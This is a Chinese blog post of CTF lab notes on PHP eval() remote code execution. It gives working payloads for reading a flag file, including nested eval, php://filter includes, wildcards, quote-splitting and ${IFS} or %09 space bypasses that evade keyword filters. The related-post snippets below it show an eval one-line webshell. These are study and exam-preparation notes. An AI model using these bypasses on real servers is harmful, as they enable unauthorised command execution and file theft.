网安入门22——RCE(代码执行Eval)

已于 2023-10-15 11:22:49 修改
阅读量205 收藏
点赞数
分类专栏: CISP-PTE备考之路 文章标签: php
于 2023-10-13 11:30:52 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_61499194/article/details/133786367
版权

RCE(remote command/code execute ,远程命令执行)
命令执行一般发生在远程,故被称为远程命令执行。
分为远程命令执行ping和远程代码执行evel。

PHP eval() 函数

PHP eval() 函数

rce1(引入)

拿到这道题,是一个白盒代码审计
目标语句是拿到tmp目录下的flag.php
让系统执行以下语句
cat /tmp/flag.php
题目
error_reporting() 使程序不报错,降低敏感性
preg_match() 用来正则匹配,检测c中有没有flag
eval() 执行c命令,c是由get传入的参数
于是就可以先用phpinfo()测试一下
当然还可以执行系统命令system,通配符绕过
c=system("cat /tmp/fla?.php");
在这里插入图片描述
还可以用嵌套eval来绕过flag的正则匹配,原理在于preg_match只对c做了过滤,没对w进行过滤
c=eval($_GET[w]);&w=system("cat /tmp/flag.php");
在这里插入图片描述
拼接源代码后,eval($ _GET[w]);)会按照php代码来执行:在这里插入图片描述
当然也可以直接c=system()
c=system($_GET[w]);&w=cat /tmp/flag.php在这里插入图片描述还可以用文件包含的伪协议命令来读文件
文件包含payload:
?filename=php:/filter/convert.base64-encode/resource=文件路径.php
本关paylaod:
c=include(&_GET[w]);&w=php:/filter/convert.base64-encode/resource=/tmp/flag.php
在这里插入图片描述
还可以用反引号,但是没有自带回显,需要加上echo
在这里插入图片描述

rce2(变形)

这次过滤更加严格,我们先用二次eval
c=eval($_GET[w]);&w=phpinfo();
c=eval($_GET[w]);&w=system(cat /tmp/flag.php)
在这里插入图片描述
反应号也可以使用,但是绕过空格不能用$IFS$9,此时是代码层面,不是操作系统,可以使用%09
在这里插入图片描述
然后cat被过滤了,可以用more,跟tac
在这里插入图片描述

rce3

这关代码过滤的更多了
在这里插入图片描述
关键在于怎么绕过cat
在这里插入图片描述
可以使用之前的单引号绕过
c=c'a't${IFS}/tmp/fla?.php
如果直接c?t,系统的全局变量无法发挥作用,找不到这个文件
这里来一种新方式,想给cat用通配符,就要用cat的绝对路劲
bin目录下有很多可执行的文件
在这里插入图片描述

c=/bin/c?t${IFS}/tmp/fla?.php
在这里插入图片描述

挑不动
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
thinkphp-2x-rce 代码执行
weixin_46580614的博客
08-20 863
thinkphp-2x-rce 代码执行 漏洞描述 ​ ThinkPHP框架 - 是由上海顶想公司开发维护的MVC结构的开源PHP框架,遵循Apache2开源协议发布,是为了敏捷WEB应用开发和简化企业应用开发而诞生的。 ThinkPHP ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞 影响版本 Thinkphp 2.x的版本 实验环境 攻击机:win10 靶机:vulfocus平台 thinkphp-2x-rce
【愚公系列】2024年03月 《CTF实战:从入门到提升》 010-Web安全入门PHP代码执行漏洞)
热门推荐
时光隧道
03-28 5万+
PHP代码执行漏洞是一种常见的安全漏洞,也被称为远程代码执行(Remote Code Execution,RCE)漏洞。这种漏洞的发生通常是由于程序员在编写代码时未正确过滤用户输入,导致用户能够将恶意代码插入到应用程序中,然后被解释器执行。攻击者可以利用这种漏洞执行任意代码,从而获取系统权限、窃取数据或者对系统进行进一步的攻击。未过滤用户输入:开发者在使用用户输入时必须进行严格的输入验证和过滤,避免直接将用户输入作为代码执行eval() 和 exec() 函数。
CTFHub技能树web(持续更新)--RCE--eval执行
jiuyongpinyin的博客
01-25 306
eval执行 这道题没读懂题,代码功力还是不太行,我已知以为是直接用cmd参数传参,结果看了大神的结题思路才知道,直接用蚁剑或者菜刀连接就行。 大神链接:点我看大神链接 我这里用蚁剑直接连接: 进入后,flag在根目录下: 注:萌新第一次写write up,不足之处还请见谅,不对之处欢迎批评指正 ...
CTFhub RCE eval
luminous_you的博客
12-07 323
方法一: 可以用蚁剑直接连接webshell cd / find -name flag*//查找当前目录以及子目录下以flag开头的文件 方法二:【这里用post,用get也可以,毕竟是request记得加;】 cmd=system(“ls /”); cmd=system(“cd /;ls”); cmd=system(“cd /;cat flag_31360”); ...
CTFHUB-RCE-eval执行
u014794539的博客
07-11 280
考点 一句话木马 eval执行 思路分析 打开直接 <?php if (isset($_REQUEST['cmd'])) { eval($_REQUEST["cmd"]); } else { highlight_file(__FILE__); } ?> 那就直接连蚁剑了。。。。 直接找到了 得到flag ctfhub{587c0757ccda0ba89da63da0} ...
CTFHUB RCE-----eval执行
winofkill的博客
12-11 1686
首先进入题目 我们先了解一下php当中eval()函数的作用 eval()函数中的evalevaluate的简称,这个函数的作用就是把一段字符串当作PHP语句来执行。 比如说eval($_REQUEST["cmd"]) $_REQUEST[]是接收数据用的,而其中的cmd 就是其中的数据 进入题目 cmd是其中的参数,我们就把命令赋给cmd,我们先显示一下网页的根目录 ?cmd=system("ls "); 接着我们看上一级目录 ?cmd=system("ls /")..
【CTFHub】 RCEeval执行
cx_sam的博客
08-07 984
CTFHub RCE eval执行
通达OA的未授权、有限制未授权、upload——rce的poc.rar
09-02
接着,我们讨论“upload——rce”,即上传远程执行代码漏洞。在通达OA中,如果存在这样的漏洞,攻击者可能通过上传恶意文件,然后执行该文件,从而在服务器上获得命令执行权限。这种漏洞通常出现在文件上传功能中,...
thinkphp-2x-rce 1 代码执行
weixin_51558394的博客
08-17 486
thinkphp-2x-rce 代码执行
第30天:WEB漏洞-RCE代码及命令执行漏洞全解1
08-03
**WEB漏洞-RCE代码及命令执行漏洞全解** 在Web应用程序的开发过程中,为了实现功能的多样性与便捷性,程序员常常会使用代码调用或命令执行功能。然而,这种做法也可能带来严重的安全风险,即代码执行RCE,Remote ...
网络安全笔记 -- RCE代码及命令执行漏洞
swy66的博客
09-11 1619
RCE代码及命令执行漏洞
cctfhub---rce-eval文件执行
x2813488062的博客
02-24 3852
eval详解 命令详解 一.eval执行 <?php if (isset($_REQUEST['cmd'])) { eval($_REQUEST["cmd"]); } else { highlight_file(__FILE__); } ?> 代码中用cmd来接收传入数据 可以将代码传递给cmd来执行 /?cmd=system("pwd") system()函数的作用为执行系统命令并输出执行结果 执行 pwd 指令可立刻得知您目前所在的工作目录...
CTFHub-RCE_eval执行-wp
z1moq的博客
06-21 427
首先看看RCE是什么 RCE英文全称:remote command/code execute 分为远程命令执行ping和远程代码执行evel。 漏洞出现的原因:没有在输入口做输入处理。 我们常见的路由器、防火墙、入侵检测等设备的web管理界面上 一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。其实这就是一个接口,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统,这就是RCE漏洞 ———.
CTFHub技能书解题笔记-RCE-eval执行
qq_43006864的博客
01-27 2645
打开题目 直接就是源码。 意思是传参cmd,然后直接就执行cmd,不做任何过滤。 然后我们直接传入命令,进行测试?cmd=system("ls"); 这里直接查询了当前目录。但是没有flag,我们尝试返回上一层。 /在这里做返回上一层,可叠加使用,/../../。 看到了flag_17023。 直接查看一下,这里没做过滤,我们直接运行?cmd=system("cat /flag_17023") 就拿到了flag,这一道就是非常简答单的rce远程命令代码执行
RCE(远程命令执行)(例题包括命令注入和eval注入)
最新发布
2401_82388450的博客
04-09 1254
​远程命令/代码执行漏洞,简称为RCE漏洞,可以直接向服务器后台远程注入操作系统的命令或者代码,从而拿到服务器后台的权限。RCE分为远程执行命令(执行ping命令)和远程代码执行eval。二、RCE漏洞的分类1.命令注入(通过控制外部的参数达到执行系统命令的效果) 2.文件包含 3.eval注入(1)命令注入。
CTFHUB——RCEeval执行和文件包含漏洞
m0_46467017的博客
08-31 5510
代码解释:本关代码和第一关文件包含一样,通过strpos函数判断参数是否存在flag字符,存在就执行include函数。因为本关没有限制php://input伪协议,所以本关解法和上一关一样,这里就不再赘述了。代码解释:本关代码和之前php://input关卡一样,通过substr函数来判断file参数是否等于php://,如果等于就执行include函数。代码解释为如果存在cmd参数,那就用eval函数执行cmd参数中的代码,所以本关存在命令执行。连接成功后,其余步骤与上一关相同。...
关于命令执行与反序列化
wouderw的博客
11-10 169
Impossible级别的代码加入了Anti-CSRF token,同时对参数ip进行了严格的限制,只有诸如“数字.数字.数字.数字”的输入才会被接收执行,因此不存在命令注入漏洞。当进行反序列化的时候就有可能会触发对象中的一些魔术方法,造成意想不到的危害。因此,如果需要给前端用户提供操作类的API接口,一定需要对接口输入的内容进行严格的判断,比如实施严格的白名单策略会是一个比较好的方法。然后我们将这串值中的可控变量替换为我们的攻击代码,(即得到序列化值,将正常的值替换为攻击代码,让之后执行替换的攻击代码
网安入门20——RCE(命令执行Ping)
m0_61499194的博客
10-02 1071
源码分析:源代码中先对操作系统进行校验,如果是Windos默认ping4次,Linux系统则是现需要手动设置发包次数,传入的ip未作处理,直接拼接到系统命令中,未作任何处理,最后用shell_exec()执行命令,与system()命令类似,可以直接执行系统层面命令。这种漏洞可能导致严重的安全问题,因此开发人员需要采取适当的防御措施来防止命令执行漏洞的发生。为了防止命令执行漏洞,开发人员应该对用户输入进行严格的验证和过滤,确保输入的数据符合预期的格式和范围。命令执行是在目标服务器上任意执行系统命令。
CTFhub-RCE-evel执行
ssss39的博客
11-13 132
打开flag文件发现FLAG。根据PHP代码显示,要求。
远程代码执行漏洞RCE原理
03-28
远程代码执行漏洞(Remote Code Execution,RCE)是指攻击者通过利用程序或系统中的漏洞,成功地在远程主机上执行自己编写或者上传的恶意代码。攻击者可以利用这个漏洞执行系统命令、上传或下载文件、获取敏感信息等,从而对系统进行攻击。 RCE漏洞的原理是攻击者在程序或系统中注入恶意代码,并且成功执行代码,从而实现攻击目的。攻击者通常利用程序或系统中的安全漏洞,比如未经过滤的用户输入、未授权的访问、缓冲区溢出等进行攻击,通过给予恶意代码执行权限,轻松地控制远程主机。 RCE漏洞的危害非常大,攻击者可以通过该漏洞远程控制系统,获取敏感信息,甚至篡改系统中的数据。因此,对于程序开发人员和系统管理员来说,必须要重视漏洞的防范和修复工作,及时更新补丁,加强安全防护,从而有效地防范远程代码执行漏洞的攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

挑不动

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值